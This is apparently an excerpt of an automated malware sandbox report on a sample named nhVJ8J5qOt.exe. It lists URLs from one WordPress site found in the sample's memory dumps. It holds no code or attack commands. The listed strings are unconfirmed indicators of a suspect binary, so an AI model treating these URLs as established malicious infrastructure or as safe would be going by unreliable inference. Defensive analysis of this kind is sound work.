                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/superfish.js
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-content/themes/thematic/library/scripts/thematic-dropdowns.js
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/classic-themes.min.css?ver=6.2.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-includes/wlwmanifest.xml
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F&#038;format=xml
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/wp/v2/pages/28
